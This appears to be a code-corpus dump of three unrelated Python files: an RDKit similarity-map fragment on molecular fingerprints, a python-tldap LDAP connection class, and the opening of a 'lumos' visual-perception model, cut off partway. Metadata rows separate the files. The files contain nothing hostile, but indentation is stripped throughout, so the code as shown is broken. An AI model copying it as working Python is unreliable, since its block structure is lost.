def GetSimilarityMapForModel(probeMol, fpFunction, predictionFunction, **kwargs):
"""
Generates the similarity map for a given ML model and probe molecule,
and fingerprint function.
Parameters:
probeMol -- the probe molecule
fpFunction -- the fingerprint function
predictionFunction -- the prediction function of the ML model
kwargs -- additional arguments for drawing
"""
weights = GetAtomicWeightsForModel(probeMol, fpFunction, predictionFunction)
weights, maxWeight = GetStandardizedWeights(weights)
fig = GetSimilarityMapFromWeights(probeMol, weights, **kwargs)
return fig, maxWeight
apDict = {}
apDict['normal'] = lambda m, bits, minl, maxl, bpe, ia, **kwargs: rdMD.GetAtomPairFingerprint(
m, minLength=minl, maxLength=maxl, ignoreAtoms=ia, **kwargs)
apDict['hashed'] = lambda m, bits, minl, maxl, bpe, ia, **kwargs: rdMD.GetHashedAtomPairFingerprint(
m, nBits=bits, minLength=minl, maxLength=maxl, ignoreAtoms=ia, **kwargs)
apDict[
'bv'] = lambda m, bits, minl, maxl, bpe, ia, **kwargs: rdMD.GetHashedAtomPairFingerprintAsBitVect(
m, nBits=bits, minLength=minl, maxLength=maxl, nBitsPerEntry=bpe, ignoreAtoms=ia, **kwargs)
# usage: lambda m,i: GetAPFingerprint(m, i, fpType, nBits, minLength, maxLength, nBitsPerEntry)
def GetAPFingerprint(mol, atomId=-1, fpType='normal', nBits=2048, minLength=1, maxLength=30,
nBitsPerEntry=4, **kwargs):
"""
Calculates the atom-pair fingerprint with the pairs involving atomId removed.
Parameters:
mol -- the molecule of interest
atomId -- the atom to remove the pairs for (if -1, no pair is removed)
fpType -- the type of AP fingerprint ('normal', 'hashed', 'bv')
nBits -- the size of the bit vector (only for fpType='bv')
minLength -- the minimum path length for an atom pair
maxLength -- the maximum path length for an atom pair
nBitsPerEntry -- the number of bits available for each pair
"""
if fpType not in ['normal', 'hashed', 'bv']:
raise ValueError("Unknown Atom pairs fingerprint type")
if atomId < 0:
return apDict[fpType](mol, nBits, minLength, maxLength, nBitsPerEntry, 0, **kwargs)
if atomId >= mol.GetNumAtoms():
raise ValueError("atom index greater than number of atoms")
return apDict[fpType](mol, nBits, minLength, maxLength, nBitsPerEntry, [atomId], **kwargs)
ttDict = {}
ttDict['normal'] = lambda m, bits, ts, bpe, ia, **kwargs: rdMD.GetTopologicalTorsionFingerprint(
m, targetSize=ts, ignoreAtoms=ia, **kwargs)
ttDict[
'hashed'] = lambda m, bits, ts, bpe, ia, **kwargs: rdMD.GetHashedTopologicalTorsionFingerprint(
m, nBits=bits, targetSize=ts, ignoreAtoms=ia, **kwargs)
ttDict[
'bv'] = lambda m, bits, ts, bpe, ia, **kwargs: rdMD.GetHashedTopologicalTorsionFingerprintAsBitVect(
m, nBits=bits, targetSize=ts, nBitsPerEntry=bpe, ignoreAtoms=ia, **kwargs)
# usage: lambda m,i: GetTTFingerprint(m, i, fpType, nBits, targetSize)
def GetTTFingerprint(mol, atomId=-1, fpType='normal', nBits=2048, targetSize=4, nBitsPerEntry=4,
**kwargs):
"""
Calculates the topological torsion fingerprint with the torsions involving atomId removed.
Parameters:
mol -- the molecule of interest
atomId -- the atom to remove the torsions for (if -1, no torsion is removed)
fpType -- the type of TT fingerprint ('normal', 'hashed', 'bv')
nBits -- the size of the bit vector (only for fpType='bv')
targetSize -- the number of atoms in a torsion path (default: 4)
nBitsPerEntry -- the number of bits available for each torsion
any additional keyword arguments will be passed to the fingerprinting function.
"""
if fpType not in ['normal', 'hashed', 'bv']:
raise ValueError("Unknown Topological torsion fingerprint type")
if atomId < 0:
return ttDict[fpType](mol, nBits, targetSize, nBitsPerEntry, 0, **kwargs)
if atomId >= mol.GetNumAtoms():
raise ValueError("atom index greater than number of atoms")
return ttDict[fpType](mol, nBits, targetSize, nBitsPerEntry, [atomId], **kwargs)
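# Hedged sketch mirroring the usage comments above (helper name is
# illustrative): the atom-pair and torsion helpers are typically handed to
# GetSimilarityMapForFingerprint through a lambda.
def _exampleAtomPairAndTorsionMaps(refMol, probeMol):
  figAP, _ = GetSimilarityMapForFingerprint(
    refMol, probeMol, lambda m, i: GetAPFingerprint(m, atomId=i, fpType='bv'))
  figTT, _ = GetSimilarityMapForFingerprint(
    refMol, probeMol, lambda m, i: GetTTFingerprint(m, atomId=i, fpType='bv'))
  return figAP, figTT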
# usage: lambda m,i: GetMorganFingerprint(m, i, radius, fpType, nBits, useFeatures)
def GetMorganFingerprint(mol, atomId=-1, radius=2, fpType='bv', nBits=2048, useFeatures=False,
**kwargs):
"""
Calculates the Morgan fingerprint with the environments of atomId removed.
Parameters:
mol -- the molecule of interest
radius -- the maximum radius
fpType -- the type of Morgan fingerprint: 'count' or 'bv'
atomId -- the atom to remove the environments for (if -1, no environment is removed)
nBits -- the size of the bit vector (only for fpType = 'bv')
useFeatures -- if false: ConnectivityMorgan, if true: FeatureMorgan
any additional keyword arguments will be passed to the fingerprinting function.
"""
if fpType not in ['bv', 'count']:
raise ValueError("Unknown Morgan fingerprint type")
if not hasattr(mol, '_fpInfo'):
info = {}
# get the fingerprint
if fpType == 'bv':
molFp = rdMD.GetMorganFingerprintAsBitVect(mol, radius, nBits=nBits, useFeatures=useFeatures,
bitInfo=info, **kwargs)
else:
molFp = rdMD.GetMorganFingerprint(mol, radius, useFeatures=useFeatures, bitInfo=info,
**kwargs)
# construct the bit map
if fpType == 'bv':
bitmap = [DataStructs.ExplicitBitVect(nBits) for _ in range(mol.GetNumAtoms())]
else:
bitmap = [[] for _ in range(mol.GetNumAtoms())]
for bit, es in info.items():
for at1, rad in es:
if rad == 0: # for radius 0
if fpType == 'bv':
bitmap[at1][bit] = 1
else:
bitmap[at1].append(bit)
else: # for radii > 0
env = Chem.FindAtomEnvironmentOfRadiusN(mol, rad, at1)
amap = {}
Chem.PathToSubmol(mol, env, atomMap=amap)
for at2 in amap.keys():
if fpType == 'bv':
bitmap[at2][bit] = 1
else:
bitmap[at2].append(bit)
mol._fpInfo = (molFp, bitmap)
if atomId < 0:
return mol._fpInfo[0]
else: # remove the bits of atomId
if atomId >= mol.GetNumAtoms():
raise ValueError("atom index greater than number of atoms")
if len(mol._fpInfo) != 2:
raise ValueError("_fpInfo not set")
if fpType == 'bv':
molFp = mol._fpInfo[0] ^ mol._fpInfo[1][atomId] # xor
else: # count
molFp = copy.deepcopy(mol._fpInfo[0])
# delete the bits with atomId
for bit in mol._fpInfo[1][atomId]:
molFp[bit] -= 1
return molFp
# usage: lambda m,i: GetRDKFingerprint(m, i, fpType, nBits, minPath, maxPath, nBitsPerHash)
def GetRDKFingerprint(mol, atomId=-1, fpType='bv', nBits=2048, minPath=1, maxPath=5, nBitsPerHash=2,
**kwargs):
"""
Calculates the RDKit fingerprint with the paths of atomId removed.
Parameters:
mol -- the molecule of interest
atomId -- the atom to remove the paths for (if -1, no path is removed)
fpType -- the type of RDKit fingerprint: 'bv'
nBits -- the size of the bit vector
minPath -- minimum path length
maxPath -- maximum path length
nBitsPerHash -- number of bits to set per path
"""
if fpType not in ['bv', '']:
raise ValueError("Unknown RDKit fingerprint type")
fpType = 'bv'
if not hasattr(mol, '_fpInfo'):
info = [] # list with bits for each atom
# get the fingerprint
molFp = Chem.RDKFingerprint(mol, fpSize=nBits, minPath=minPath, maxPath=maxPath,
nBitsPerHash=nBitsPerHash, atomBits=info, **kwargs)
mol._fpInfo = (molFp, info)
if atomId < 0:
return mol._fpInfo[0]
else: # remove the bits of atomId
if atomId >= mol.GetNumAtoms():
raise ValueError("atom index greater than number of atoms")
if len(mol._fpInfo) != 2:
raise ValueError("_fpInfo not set")
molFp = copy.deepcopy(mol._fpInfo[0])
molFp.UnSetBitsFromList(mol._fpInfo[1][atomId])
return molFp
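# Hypothetical usage sketch for the model-based map: `clf` stands for any
# trained scikit-learn-style classifier exposing predict_proba; it is not
# provided by this module, and the probability-extraction lambda is an
# assumption about how such a model would be wired in.
def _exampleSimilarityMapForModel(probeMol, clf):
  fig, maxWeight = GetSimilarityMapForModel(
    probeMol,
    lambda m, i: GetMorganFingerprint(m, atomId=i, radius=2, fpType='bv'),
    lambda fp: clf.predict_proba((fp,))[0][1])
  return fig, maxWeight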
| greglandrum/rdkit | rdkit/Chem/Draw/SimilarityMaps.py | Python | bsd-3-clause | 17,614 | ["RDKit"] | 3edd3595ccdb0238034b36308c2b05c1f815f198856c919ee97df57d77af2dd6 |
# Copyright 2012-2014 Brian May
#
# This file is part of python-tldap.
#
# python-tldap is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-tldap is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with python-tldap If not, see <http://www.gnu.org/licenses/>.
""" This module provides the LDAP base functions
with a subset of the functions from the real ldap module. """
import ssl
import ldap3
import logging
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
logger = logging.getLogger(__name__)
def _debug(*argv):
argv = [str(arg) for arg in argv]
logger.debug(" ".join(argv))
class LDAPbase(object):
""" The vase LDAP connection class. """
def __init__(self, settings_dict):
self.settings_dict = settings_dict
self._obj = None
def reset(self):
pass
def close(self):
if self._obj is not None:
self._obj.unbind()
self._obj = None
#########################
# Connection Management #
#########################
def check_password(self, dn, password):
try:
conn = self._connect(user=dn, password=password)
conn.unbind()
return True
except ldap3.LDAPInvalidCredentialsResult:
return False
def _connect(self, user, password):
settings = self.settings_dict
_debug("connecting")
url = urlparse(settings['URI'])
if url.scheme == "ldaps":
use_ssl = True
elif url.scheme == "ldap":
use_ssl = False
else:
raise RuntimeError("Unknown scheme '%s'" % url.scheme)
if ":" in url.netloc:
host, port = url.netloc.split(":")
port = int(port)
else:
host = url.netloc
if use_ssl:
port = 636
else:
port = 389
start_tls = False
if 'START_TLS' in settings and settings['START_TLS']:
start_tls = True
tls = None
if use_ssl or start_tls:
tls = ldap3.Tls()
if 'TLS_CA' in settings and settings['TLS_CA']:
tls.ca_certs_file = settings['TLS_CA']
if 'REQUIRE_TLS' in settings and settings['REQUIRE_TLS']:
tls.validate = ssl.CERT_REQUIRED
s = ldap3.Server(host, port=port, use_ssl=use_ssl, tls=tls)
c = ldap3.Connection(
s, # client_strategy=ldap3.STRATEGY_SYNC_RESTARTABLE,
user=user, password=password, authentication=ldap3.AUTH_SIMPLE)
c.strategy.restartable_sleep_time = 0
c.strategy.restartable_tries = 1
c.raise_exceptions = True
c.open()
if start_tls:
c.start_tls()
try:
c.bind()
except:
c.unbind()
raise
return c
def _reconnect(self):
settings = self.settings_dict
try:
self._obj = self._connect(
user=settings['USER'], password=settings['PASSWORD'])
except Exception:
self._obj = None
raise
assert self._obj is not None
def _do_with_retry(self, fn):
if self._obj is None:
self._reconnect()
assert self._obj is not None
try:
return fn(self._obj)
except ldap3.core.exceptions.LDAPSessionTerminatedByServerError:
# if it fails, reconnect then retry
_debug("SERVER_DOWN, reconnecting")
self._reconnect()
return fn(self._obj)
###################
# read only stuff #
###################
def search(self, base, scope, filterstr='(objectClass=*)',
attrlist=None, limit=None):
"""
Search for entries in LDAP database.
"""
_debug("search", base, scope, filterstr, attrlist, limit)
# first results
if attrlist is None:
attrlist = ldap3.ALL_ATTRIBUTES
elif isinstance(attrlist, set):
attrlist = list(attrlist)
def first_results(obj):
_debug("---> searching ldap", limit)
obj.search(
base, filterstr, scope, attributes=attrlist, paged_size=limit)
return obj.response
# get the 1st result
result_list = self._do_with_retry(first_results)
# Loop over list of search results
for result_item in result_list:
# skip searchResRef for now
if result_item['type'] != "searchResEntry":
continue
dn = result_item['dn']
attributes = result_item['raw_attributes']
# did we already retrieve this from cache?
_debug("---> got ldap result", dn)
_debug("---> yielding", result_item)
yield (dn, attributes)
# we are finished - return results, eat cake
_debug("---> done")
return
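# Hypothetical usage sketch (function name, server, credentials and base DN are
# placeholders): the settings keys follow the ones checked in _connect above.
def _example_search():
    settings = {
        'URI': 'ldaps://ldap.example.org',
        'USER': 'cn=admin,dc=example,dc=org',
        'PASSWORD': 'secret',
    }
    conn = LDAPbase(settings)
    for dn, attributes in conn.search(
            'dc=example,dc=org', ldap3.SUBTREE, '(uid=jsmith)', ['cn', 'mail']):
        _debug("found", dn, attributes)
    conn.close()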
| brianmay/python-tldap-debian | tldap/backend/base.py | Python | gpl-3.0 | 5,414 | ["Brian"] | 391c5b395e631dd7fb3cebc5400b56533b678d0ba4348d74f4488999773915fa |
"""A biologically-inspired model of visual perception."""
from math import exp, hypot
import logging
import numpy as np
import cv2
import cv2.cv as cv
from collections import OrderedDict, deque
from itertools import izip
#import pyNN.neuron as sim
from lumos.context import Context
from lumos.util import Enum, getNormMap
from lumos.input import Projector, run
from lumos import rpc
from ..util.buffer import InputBuffer, OutputBuffer, BidirectionalBuffer, BufferAccessError
from ..neuron import Neuron, Population, Projection, neuron_inhibition_period, Uniform, MultivariateUniform, MultivariateNormal, NeuronMonitor, plotPopulations
from .photoreceptor import Rod, Cone
from .simplified.visual_cortex import SalienceNeuron, SelectionNeuron, FeatureNeuron
from ..motion.ocular import EmulatedOcularMotionSystem
# Global variables
default_feature_weight = 0.9 # default weight for a feature pathway, treated as update probability for its neurons
default_feature_weight_rest = 0.25 # default weight for features other than the ones desired
# Global GUI options
default_window_flags = cv2.WINDOW_AUTOSIZE | 0x00000010 # CV_GUI_NORMAL = 0x00000010
# Global initialization
np.set_printoptions(precision=4, linewidth=120) # for printing feature vectors: a few decimal places are fine; try not to break lines, especially in log files
class VisualFeaturePathway(object):
"""A collection of connected neuron populations that together compute a particular visual feature."""
def __init__(self, label, populations, projections, output=None, p=default_feature_weight, timeNow=0.0):
self.label = label
self.logger = logging.getLogger("{}-pathway".format(self.label))
self.populations = populations # order of populations matters here; this is the order in which they will be updated
self.projections = projections
#assert output in self.populations # usually, output is a population, but it can be something else
self.output = output
self.timeNow = timeNow
# * Top-level interface (TODO add neuron response/spike frequency as measure of strength)
self.active = True # used to selectively update specific pathways
self.p = p # update probability
self.selectedNeuron = None # the last selected SelectionNeuron, mainly for display and top-level output
self.selectedTime = 0.0 # corresponding timestamp
self.logger.debug("Initialized {}".format(self))
def update(self, timeNow):
self.timeNow = timeNow
# feature pathway specific updates may need to be carried out externally
def __str__(self):
return "{obj.label}-pathway: active: {obj.active}, p: {obj.p}, output: {output}".format(obj=self, output=(self.output.neurons[0].potential if self.output is not None and len(self.output.neurons) > 0 else None))
class Finst(object):
"""Finger of INSTantiation: A percept defined by a location in allocentric space, used for modulating attention."""
max_activation = 1.0
half_life = 5.0
min_good_activation = 0.1 # FINSTs with activation less than this could be discarded
default_radius = 100
def __init__(self, location, focusPoint, radius=None, timeCreated=0.0, activationCreated=max_activation):
self.location = location # egocentric fixation location at time of creation
self.focusPoint = focusPoint # allocentric focus point at time of creation
self.radius = radius if radius is not None else self.default_radius # an indicator of size
self.timeCreated = timeCreated # creation time
self.activationCreated = activationCreated # a measure of the strength of the FINST upon creation
self.inhibitionMap = getNormMap(self.radius * 2, sigma=self.radius / 3.0) # soft inhibition map based on Normal PDF
self.update(timeCreated)
def update(self, timeNow):
deltaTime = timeNow - self.timeCreated
self.activation = self.activationCreated / (2 ** (deltaTime / self.half_life))
def getAdjustedLocation(self, focusPoint):
return (self.location[0] + self.focusPoint[0] - focusPoint[0], self.location[1] + self.focusPoint[1] - focusPoint[1])
def __str__(self):
return "<loc: {self.location}, focus: {self.focusPoint}, act: {self.activation:.3f}>".format(self=self)
class VisualSystem(object):
"""Complete system for processing dynamic visual input."""
State = Enum(('NONE', 'FREE', 'SACCADE', 'FIXATE'))
intents = ['find', 'hold', 'release', 'reset'] # all supported intents
default_image_size = (256, 256) # (width, height) TODO read from context options
num_rods = 10000 # human: 90-120 million
num_cones = 1000 # human: 4.5-6 million
num_bipolar_cells = 2000
num_ganglion_cells = 1000
num_salience_neurons = 400
num_selection_neurons = 100
num_feature_neurons = 2 # no. of feature neurons per pathway, more implies finer feature resolution
num_finsts = 5 # no. of visual FINSTs
finst_decay_enabled = False # if enabled, FINST activations will be updated and those with low activation will be purged
finst_inhibition_enabled = True # if active FINST locations are inhibited
max_free_duration = 2.0 # artificial bound to prevent no results in case of very low salience inputs
min_saccade_duration = 0.05 # human: 0.02s (20ms)
#max_saccade_duration = 0.5 # human: 0.2s (200ms); not used as we end saccade period when ocular motion stops
min_fixation_duration = 0.5 # human: 0.1s (100ms), varies based by activity
max_fixation_duration = 3.0 # human: 0.5s (500ms), varies considerably by activity, affected by cognitive control
max_hold_duration = 5.0
min_good_salience = 0.66 # recommended values: 0.66 (filters out most unwanted regions)
min_saccade_salience = 0.175 # minimum salience required to make a saccade to (otherwise reset to center)
foveal_radius_ratio = 0.2 # fraction of distance from center to corners of the retina that is considered to be in foveal region
#default_fovea_size = (int(foveal_radius_ratio * default_image_size[0]), int(foveal_radius_ratio * default_image_size[1]))
default_fovea_size = (100, 100) # fixed size; specify None to compute using foveal radius and image size in __init__()
central_radius_ratio = 0.5 # radius to mark central region where visual acuity is modest and then falls off with eccentricity
def __init__(self, imageSize=default_image_size, foveaSize=default_fovea_size, timeNow=0.0, showMonitor=None, ocularMotionSystem=None):
# * Get context and logger
self.context = Context.getInstance()
self.logger = logging.getLogger(self.__class__.__name__)
# * Accept arguments, read parameters (TODO)
self.imageSize = imageSize # (width, height)
self.foveaSize = foveaSize
self.timeNow = timeNow
self.ocularMotionSystem = ocularMotionSystem # for eye movements, if available
# * System state
self.state = self.State.NONE
self.lastTransitionTime = self.timeNow
self.hold = False # hold gaze at a fixed location?
# * Structural/spatial members
self.bounds = np.float32([[0.0, 0.0, 2.0], [self.imageSize[0] - 1, self.imageSize[1] - 1, 4.0]])
self.center = (self.bounds[0] + self.bounds[1]) / 2
# * Images and related members (TODO do we need to initialize these at all? - new images are generated every update)
self.imageCenter = (self.imageSize[1] / 2, self.imageSize[0] / 2)
self.fovealRadius = hypot(self.imageCenter[0], self.imageCenter[1]) * self.foveal_radius_ratio
if self.foveaSize is None:
self.foveaSize = (int(self.fovealRadius * 2), int(self.fovealRadius * 2))
self.fovealSlice = np.index_exp[int(self.imageCenter[1] - self.foveaSize[1] / 2):int(self.imageCenter[1] + self.foveaSize[1] / 2), int(self.imageCenter[0] - self.foveaSize[0] / 2):int(self.imageCenter[0] + self.foveaSize[0] / 2)]
self.fixationSlice = self.fovealSlice
self.imageShapeC3 = (self.imageSize[1], self.imageSize[0], 3) # numpy shape for 3 channel images
self.imageShapeC1 = (self.imageSize[1], self.imageSize[0]) # numpy shape for single channel images
# NOTE Image shapes (h, w, 1) and (h, w) are not compatible unless we use keepdims=True for numpy operations
self.imageTypeInt = np.uint8 # numpy dtype for integer-valued images
self.imageTypeFloat = np.float32 # numpy dtype for real-valued images
self.images = OrderedDict()
# ** RGB and HSV images
self.images['BGR'] = np.zeros(self.imageShapeC3, dtype=self.imageTypeInt)
self.images['HSV'] = np.zeros(self.imageShapeC3, dtype=self.imageTypeInt)
self.images['H'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt)
self.images['S'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt)
self.images['V'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt)
# ** Rod and Cone response images (frequency/hue-dependent)
self.images['Rod'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Cone'] = OrderedDict() # NOTE dict keys must match names of Cone.cone_types (should this be flattened?)
self.images['Cone']['S'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Cone']['M'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Cone']['L'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
# ** Bipolar cell response images
# NOTE Rod bipolars are ON-center only; they connect to OFF-center Ganglion cells to initiate the dark pathway
# Here, an OFF map is computed from the ON map in order to simplify computation only
self.images['Bipolar'] = OrderedDict()
self.images['Bipolar']['ON'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Bipolar']['OFF'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Bipolar']['S'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Bipolar']['M'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Bipolar']['L'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
# ** Ganglion cell response images, the source of cortical feature channels
# TODO Add more Ganglion cell types with different receptive field properties
# 'RG' +Red -Green
# 'GR' +Green -Red
# 'RB' +Red -Blue
# 'BR' +Blue -Red
# 'BY' +Blue -Yellow
# 'YB' +Yellow -Blue
# 'WK' +White -Black (currently 'ON')
# 'KW' +Black -White (currently 'OFF')
# NOTE R = L cones, G = M cones, B = S cones
self.ganglionTypes = ['ON', 'OFF', 'RG', 'GR', 'RB', 'BR', 'BY', 'YB']
self.featurePlotColors = {'ON': 'gray', 'OFF': 'black', 'RG': 'red', 'GR': 'green', 'RB': 'tomato', 'BR': 'blue', 'BY': 'magenta', 'YB': 'gold'}
self.numGanglionTypes = np.int_(len(self.ganglionTypes)) # TODO use a single num-features parameter across the board?
self.numGanglionTypes_inv = 1.0 / self.imageTypeFloat(self.numGanglionTypes) # [optimization: frequently used quantity]
self.images['Ganglion'] = OrderedDict()
for ganglionType in self.ganglionTypes:
self.images['Ganglion'][ganglionType] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
# ** Combined response (salience) image (and related variables)
self.images['Salience'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.maxSalience = 0.0
self.maxSalienceLoc = (-1, -1)
# ** Spatial weight map with a central soft spotlight (use np.ogrid?)
self.images['Weight'] = getNormMap(self.imageSize[0], sigma=self.imageSize[0] / 2.0) # X-Y symmetric
# * Image processing elements
self.bipolarBlurSize = (11, 11) # size of blurring kernel used when computing Bipolar cell response
self.ganglionCenterSurroundKernel = self.imageTypeFloat(
[ [ -1, -1, -1, -1, -1, -1, -1 ],
[ -1, -1, -1, -1, -1, -1, -1 ],
[ -1, -1, 7, 7, 7, -1, -1 ],
[ -1, -1, 7, 9, 7, -1, -1 ],
[ -1, -1, 7, 7, 7, -1, -1 ],
[ -1, -1, -1, -1, -1, -1, -1 ],
[ -1, -1, -1, -1, -1, -1, -1 ] ])
self.ganglionCenterSurroundKernel /= np.sum(self.ganglionCenterSurroundKernel) # normalize
#self.logger.info("Ganglion center-surround kernel:\n{}".format(self.ganglionCenterSurroundKernel)) # [debug]
self.ganglionKernelLevels = 4
self.ganglionKernels = [None] * self.ganglionKernelLevels
self.ganglionKernels[0] = self.ganglionCenterSurroundKernel
for i in xrange(1, self.ganglionKernelLevels):
self.ganglionKernels[i] = cv2.resize(self.ganglionKernels[i - 1], dsize=None, fx=2, fy=2)
self.ganglionKernels[i] /= np.sum(self.ganglionKernels[i]) # normalize
#self.logger.info("Ganglion center-surround kernel sizes ({} levels): {}".format(self.ganglionKernelLevels, ", ".join("{}".format(k.shape) for k in self.ganglionKernels))) # [debug]
# * Neuron Populations and Projections connecting them
self.populations = OrderedDict() # dict with key = population label
self.projections = OrderedDict() # mapping from (pre_label, post_label) => projection object
# ** Retinal layers (TODO move this to a separate Retina class?)
self.createRetina()
# ** Layers in the Visual Cortex (TODO move this to a separate VisualCortex class?)
self.createVisualCortex() # creates and populates self.featurePathways
# * Eye movement
self.saccadeSalience = 0.0 # salience of last location we moved to
self.saccadeTarget = (0, 0) # center-relative
#self.lastSaccadeTime = self.timeNow # [unused]
self.fixationLoc = None # not None when fixated
# * FINSTs for maintaining attended locations
self.finsts = deque(maxlen=self.num_finsts)
# * Output image and plots
self.imageOut = None
if self.context.options.gui:
#self.imageOut = np.zeros(self.imageShapeC3, dtype=self.imageTypeInt)
cv2.namedWindow("Input", flags=default_window_flags)
cv2.namedWindow("Retina", flags=default_window_flags)
cv2.namedWindow("Output", flags=default_window_flags)
if self.context.options.debug:
for pathwayLabel in self.featurePathways.iterkeys():
cv2.namedWindow("{} Salience".format(pathwayLabel), flags=default_window_flags)
# TODO Salience and selection output will be for each feature pathway (but the same can be rendered to, displayed and reused)
self.imageSalienceOut = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt) # salience neuron outputs
self.imageSalienceOutCombined = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt) # salience neuron outputs, all pathways combined
#self.imageSelectionOut = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt) # selection neuron outputs
if showMonitor is None:
showMonitor = self.context.options.gui and self.context.options.debug
if showMonitor:
self.neuronPotentialMonitor = NeuronMonitor(show_legend=False)
for pathwayLabel, featurePathway in self.featurePathways.iteritems():
# Monitor single feature neuron
#self.neuronPotentialMonitor.addChannel(label=pathwayLabel, obj=featurePathway.output.neurons[0], color=self.featurePlotColors[pathwayLabel]) # very hard-coded way to access single output neuron!
# Monitor all feature neurons
for idx, outputNeuron in enumerate(featurePathway.output.neurons):
self.neuronPotentialMonitor.addChannel(label="{}_{}".format(pathwayLabel, idx), obj=outputNeuron, color=self.featurePlotColors[pathwayLabel])
self.neuronPotentialMonitor.start()
# * Buffers - mainly for communication with high-level (cognitive) architectures, other modules
# TODO Initialize all buffers with proper values
self.buffers = OrderedDict()
self.buffers['state'] = OutputBuffer(self.state)
self.buffers['intent'] = InputBuffer(self.handleIntent) # receive intent in a callable method
self.buffers['location'] = BidirectionalBuffer((0, 0)) # center-relative
self.buffers['size'] = BidirectionalBuffer((0, 0))
self.buffers['features'] = BidirectionalBuffer()
self.buffers['weights'] = InputBuffer()
self.buffers['salience'] = OutputBuffer(0.0)
self.buffers['match'] = OutputBuffer(0.0)
# * Once initialized, start in FREE state
self.transition(self.State.FREE)
def initialize(self, imageIn, timeNow):
pass # to emulate FrameProcessor-like interface
def process(self, imageIn, timeNow):
self.timeNow = timeNow
self.images['BGR'][:] = imageIn # NOTE: must be pre-allocated and of the same (compatible) shape as imageIn
if self.context.options.gui:
cv2.imshow("Retina", self.images['BGR'])
# * State-based pre-processing
if self.state == self.State.SACCADE:
# Check for saccade end
if self.timeNow > (self.lastTransitionTime + self.min_saccade_duration) and not self.ocularMotionSystem.isMoving:
self.transition(self.State.FIXATE) # TODO: transition to an intermediate state to check for successful saccade completion
else:
return True, self.imageOut # saccadic suppression - skip further processing if performing a saccade
# * TODO Read input buffers
weights = self.buffers['weights'].get_in(clear=True)
if weights is not None:
self.updateFeatureWeights(weights)
# * Get HSV
self.images['HSV'] = cv2.cvtColor(self.images['BGR'], cv2.COLOR_BGR2HSV)
self.images['H'], self.images['S'], self.images['V'] = cv2.split(self.images['HSV'])
# * Compute Rod and Cone responses
# TODO: Need non-linear response to hue, sat, val (less dependent on sat, val for cones)
# NOTE: Somehow, PhotoreceptorType.hue must be a numpy array, even if it is length 1, otherwise we hit a TypeError: <unknown> is not a numpy array!
self.images['Rod'] = self.imageTypeFloat(180 - cv2.absdiff(self.images['H'], Rod.rod_type.hue) % 180) * 255 * self.images['V'] * Rod.rod_type.responseFactor # hack: use a constant saturation value (255) to make the rod response independent of saturation
self.images['Cone']['S'] = self.imageTypeFloat(180 - cv2.absdiff(self.images['H'], Cone.cone_types[0].hue) % 180) * self.images['S'] * self.images['V'] * Cone.cone_types[0].responseFactor
self.images['Cone']['M'] = self.imageTypeFloat(180 - cv2.absdiff(self.images['H'], Cone.cone_types[1].hue) % 180) * self.images['S'] * self.images['V'] * Cone.cone_types[1].responseFactor
self.images['Cone']['L'] = self.imageTypeFloat(180 - cv2.absdiff(self.images['H'], Cone.cone_types[2].hue) % 180) * self.images['S'] * self.images['V'] * Cone.cone_types[2].responseFactor
# * Compute Bipolar and Ganglion cell responses
# ** Bipolar responses: Rods
# NOTE Blurring is a step that is effectively achieved in biology by horizontal cells
imageRodBlurred = cv2.blur(self.images['Rod'], self.bipolarBlurSize)
self.images['Bipolar']['ON'] = np.clip(self.images['Rod'] - 0.75 * imageRodBlurred, 0.0, 1.0)
self.images['Bipolar']['OFF'] = np.clip((1.0 - self.images['Rod']) - 0.9 * (1.0 - imageRodBlurred), 0.0, 1.0) # same as (1 - ON response)? (nope)
# ** Bipolar responses: Cones
# TODO Add multiscale Cone Bipolars to prevent unwanted response to diffuse illumination
imagesConeSBlurred = cv2.blur(self.images['Cone']['S'], self.bipolarBlurSize)
imagesConeMBlurred = cv2.blur(self.images['Cone']['M'], self.bipolarBlurSize)
imagesConeLBlurred = cv2.blur(self.images['Cone']['L'], self.bipolarBlurSize)
self.images['Bipolar']['S'] = np.clip(self.images['Cone']['S'] - 0.75 * imagesConeSBlurred, 0.0, 1.0)
self.images['Bipolar']['M'] = np.clip(self.images['Cone']['M'] - 0.75 * imagesConeMBlurred, 0.0, 1.0)
self.images['Bipolar']['L'] = np.clip(self.images['Cone']['L'] - 0.75 * imagesConeLBlurred, 0.0, 1.0)
# ** Ganglion cells simply add up responses from a (bunch of) central bipolar cell(s) (ON/OFF) and surrounding antagonistic bipolar cells (OFF/ON)
# *** Method 1: Center - Surround
#imageGanglionCenterON = cv2.filter2D(self.images['Bipolar']['ON'], -1, self.ganglionCenterKernel)
#imageGanglionSurroundOFF = cv2.filter2D(self.images['Bipolar']['OFF'], -1, self.ganglionSurroundKernel)
#self.images['Ganglion']['ON'] = 0.75 * imageGanglionCenterON + 0.25 * imageGanglionSurroundOFF
# *** Method 2: Center-Surround kernel
#self.images['Ganglion']['ON'] = np.clip(cv2.filter2D(self.images['Bipolar']['ON'], -1, self.ganglionCenterSurroundKernel), 0.0, 1.0)
#self.images['Ganglion']['OFF'] = np.clip(cv2.filter2D(self.images['Bipolar']['OFF'], -1, self.ganglionCenterSurroundKernel), 0.0, 1.0)
